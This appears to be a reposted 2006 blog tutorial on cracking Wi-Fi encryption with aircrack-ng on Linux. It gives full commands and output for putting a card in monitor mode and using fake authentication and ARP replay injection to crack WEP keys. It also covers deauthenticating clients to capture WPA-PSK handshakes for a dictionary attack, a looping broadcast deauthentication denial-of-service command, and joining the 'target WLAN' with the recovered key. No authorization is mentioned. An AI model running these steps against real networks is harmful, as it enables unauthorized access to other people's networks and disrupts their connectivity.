Aircrack-ng (WEP, WPA-PSK Crack)/教程使用用法破解

Aircrack-ng (WEP, WPA-PSK Crack)

Update on 12 Aug 2006 on SUSE10.1

Aircrack is a set of tools for auditing wireless networks:

  • airodump: 802.11 packet capture program
  • aireplay: 802.11 packet injection program
  • aircrack: static WEP and WPA-PSK key cracker
  • airdecap: decrypts WEP/WPA capture files

    Install Madwifi Driver

    This installation will install madwifi driver with patch aircrack.

  • Download driver and patch. First, download the latest patch, and then download the corresponding version of driver.
    # get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
    # get http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
  • Install
    # tar zxvf madwifi-ng-r1679-20060707.tar.gz
    # cd madwifi-ng-r1679-20060707/
    # patch -Np1 -i ../madwifi-ng-r1679.patch
    # make
    # make install
    # mod_probe ath_pci
  • Create a new interface from wifi0. This might be required only for madwifi-ng driver. This creates ath1 monitor mode.
    # wlanconfig ath1 create wlandev wifi0 wlanmode monitor

Install aircrack-ng

  • Download aircrack-ng from http://www.aircrack-ng.org/
  • Compile and install
    # tar zxvf aircrack-ng-0.6.tar.gz
    # cd aircrack-ng-0.6/
    # make
    # make install
    # modprobe ath_pci
  • Find wireless AP
    # iwlist ath0 scan
    ath0      Scan completed :
              Cell 01 - Address: 00:03:2F:23:96:68
                        ESSID:"hoge1"
                        Mode:Master
                        Frequency:2.412 GHz (Channel 1)
                        Quality=56/94  Signal level=-39 dBm  Noise level=-95 dBm
                        Encryption key:on
                        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                                  12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                                  48 Mb/s; 54 Mb/s
                        Extra:bcn_int=100
                        IE: WPA Version 1
                            Group Cipher : TKIP
                            Pairwise Ciphers (1) : TKIP
                            Authentication Suites (1) : PSK
                        Extra:ath_ie=dd0900037f0101000eff7f
              Cell 02 - Address: 00:03:2F:23:92:64
                        ESSID:"hoge2"
                        Mode:Master
                        Frequency:2.437 GHz (Channel 6)
                        Quality=12/94  Signal level=-83 dBm  Noise level=-95 dBm
                        Encryption key:on
                        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                                  12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                                  48 Mb/s; 54 Mb/s
                        Extra:bcn_int=100
                        IE: WPA Version 1
                            Group Cipher : TKIP
                            Pairwise Ciphers (1) : TKIP
                            Authentication Suites (1) : PSK
                        Extra:ath_ie=dd0900037f01010017ff7f
  • Create a new interface from wifi0. This might be required only for madwifi-ng driver. This creates ath1 monitor mode.
    # wlanconfig ath1 create wlandev wifi0 wlanmode monitor
  • Use aurodump-ng to look the network
    # airodump-ng ath1
    
     CH 13 ][ Elapsed: 28 s ][ 2006-08-12 15:32
    
     BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
    
     00:03:2F:23:96:68  150       65       72   1  54. WPA   hoge1
     00:03:2F:23:92:64  101        4        0   6  54. WEP?  hoge2
    
     BSSID              STATION            PWR  Packets  Probes
    
     00:03:2F:23:96:68  00:0F:A3:1C:C4:31  140        7
     00:03:2F:23:96:68  00:0F:A3:1C:C4:3E  134        5
     00:03:2F:23:96:68  00:0F:A3:1C:C4:48  132       10  hoge1
     00:03:2F:23:96:68  00:0F:A3:11:02:C7  120       11  hoge1

    This result shows some access points and clients associated with APs

    Crack WEP

    How to capture (airodump) (WEP)

    1. For this example, a PrismGT card is used. It is recognized as eth0. But other card may be ath0 or something else.
    2. Change to monitor mode
      # airmon-ng
      usage: /usr/local/sbin/airmon-ng   [channel]
      Interface       Chipset         Driver
      eth0            PrismGT         prism54
      
      # airmon-ng start eth0
      usage: /usr/local/sbin/airmon-ng   [channel]
      Interface       Chipset         Driver
      eth0            PrismGT         prism54 (monitor mode enabled)
    3. Search WLANs. 0 to hop between channels.
      # airodump-ng eth0 out 0
      
       BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:0D:0B:98:96:7F   48        2        0  11  54  WEP?  4B18E8C83ABD
       00:A0:B0:40:5C:84   87       13       16   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84  00:04:23:52:80:41   86        4  HOGE
    4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to only cature unique WEP IVs. It saves space.
      # airodump-ng eth0 out 1 1
       BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:A0:B0:40:5C:84   87       36       48   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84   00:04:23:52:80:41   87       38  HOGE

    Fake authentication (aireplay) (WEP)

    1. We will use airoeplay to inject packets, so we can capture packets easily. Open another console. Copy BSSID and paste as,
      # aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth0
      12:14:06  Sending Authentication Request
      12:14:06  Authentication successful
      12:14:06  Sending Association Request
      12:14:07  Association successful :-)

      If it cannot associate, use station’s MAC,

      # aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

      Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. In this case, setup the periodic re-association delay:

      # aireplay-ng -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
    2. Once associated, send packets as following. If you are not associated, you see no send packet.
      # aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0
      Saving APR requests in replay_arp-1112-031550.cap
      You must also start airodump to capture replies.
      Read 39123 packets (got 1024 APR requests), sent 24543 packets...
    3. If it stoped sending, you need to associate again. Consider setup of the periodic re-association delay. I used crontab to re-associate again and again.

    How to crack (aircrack) (WEP)

    1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run airodump and aircrack at the same time.
      # aircrack-ng -x -0 out.ivs

    2. For 104bit WEP needs about one million IVs. You may need one day or more time to capture the packets. However if you use aireplay and inject, you need only few hours.
    3. This is the result. It needed only a quarter a million.
    4. Aircrack can also run on Windows but aireplay is not supported though.

    Connect to the target WLAN (WEP)

    1. Once you find the key, as XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX, use it to connect to the WLAN.
      # iwconfig eth0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX
      # dhcocd eth0
      # ifconfig eth0
      eth0      Link encap:UNSPEC  HWaddr 00-0A-79-18-35-7A-0A-00-00-00-00-00-00-00-00-00
                inet addr:192.168.0.12 Bcast:192.168.0.255 Mask:255.255.255.0
                inet6 addr: fe80::20a:79ff:fe18:357a/64 Scope:Link
                UP BROADCAST RUNNING  MTU:1500  Metric:1
                RX packets:330521 errors:0 dropped:0 overruns:0 frame:0
                TX packets:157988 errors:3 dropped:0 overruns:0 carrier:0
                collisions:0 txqueuelen:1000
                RX bytes:24164635 (23.0 Mb)  TX bytes:9864176 (9.4 Mb)
                Interrupt:11
      # ping google.com
      PING google.com (72.14.207.99) 56(84) bytes of data.
      64 bytes from 72.14.207.99: icmp_seq=1 ttl=234 time=203 ms
      64 bytes from 72.14.207.99: icmp_seq=2 ttl=234 time=201 ms

    WPA-PSK (Pre-shared key) Attack

    How to capture (airodump) (WPA-PSK)

    1. For this example, PrismGT card is used. It is recognize as eth0. But other card may be ath0 or something.
    2. Change to monitor mode
      # airmon-ng
      usage: /usr/local/sbin/airmon-ng   [channel]
      Interface       Chipset         Driver
      eth0            PrismGT         prism54
      
      # airmon-ng start eth0
      usage: /usr/local/sbin/airmon-ng   [channel]
      Interface       Chipset         Driver
      eth0            PrismGT         prism54 (monitor mode enabled)
    3. Search WLANs. 0 to hop between channels.
      # airodump-ng eth0 out 0
      
       BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:0D:0B:98:96:7F   48        2        0  11  54  WEP?  4B18E8C83ABD
       00:A0:B0:40:5C:84   87       13       16   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84  00:04:23:52:80:41   86        4  HOGE
    4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE). Capture all packets. Don’t specify another 1.
      # airodump-ng eth0 out 1
       BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
      
       00:A0:B0:40:5C:84   87       36       48   1  54  WEP   HOGE
      
       BSSID              STATION            PWR  Packets  ESSID
      
       00:A0:B0:40:5C:84   00:04:23:52:80:41   87       38  HOGE

    WPA Handshake capture (airoplay) (WPA-PSK)

    [ad#gad_3]

    Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless clients.

    1. WPA Handshake capture
      # aireplay-ng -0 5 -a 00:A0:B0:40:5C:84 -c 00:04:23:52:80:41 eth0
      00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
      00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
      00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
      00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
      00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
    2. ARP request generation (optional) if above does not work.
      # aireplay-ng -0 10 -a 00:A0:B0:40:5C:84 eth0
      # aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

      After sending the five deauthentication packets, it starts listening for APR requests with attack 3. The -h option is necessary and must be the MAC address of an associated client.

    3. Mass denial-of-service (MDOS) attack
      # aireplay-ng -0 0 -a 00:A0:B0:40:5C:84 eth0

      With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.

    Dictionary attack (airoplay) (WPA-PSK)

    1. Download dictionaries. i.e from http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
    2. Make a dictionary.
      # zcat all.gz | egrep -v '^#' > dic
    3. If you do not have a handshake packet, you cannot continue, so you do aireplay -0 again.
      # aircrack-ng -w dic -0 out.cap
      
      Opening out.cap
      Read 154839 packets.
      
         #  BSSID              ESSID                     Encryption
      
         1  00:A0:B0:40:5C:84  HOGE                      WPA (1 handshake)
         2  00:02:2D:C2:38:AF                            Unknown
      
      Index number of target network ? 1
    4. Once you find a handshake packet, you can stop airodump.
    5. Yes, you find it! For this, I actually used Windows because my Linux is running an ancient Pentium II 300kHz! Only this process needs CPU power, so I used my Windows (Celeron 3GHz). It actually took less than three minutes, though.


    Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several days.

    Here is other my reports.

    Tool OS CPU usage Encryption 802. NIC Support Packet injection My recommendation
    Airsnort
    (note)
    Windows High WEP 11b Few Not supported Low
    Airsnort
    (note)
    Linux High WEP 11b Few Not supported Low
    Aircrack
    (note)
    Windows Low WEP, WPA 11a/b/g Many Not supported Mid
    Aircrack Linux Low WEP, WPA 11a/b/g Many Supported! Recommended!

    from:http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html




coded by nessus
发表评论?

0 条评论。

发表评论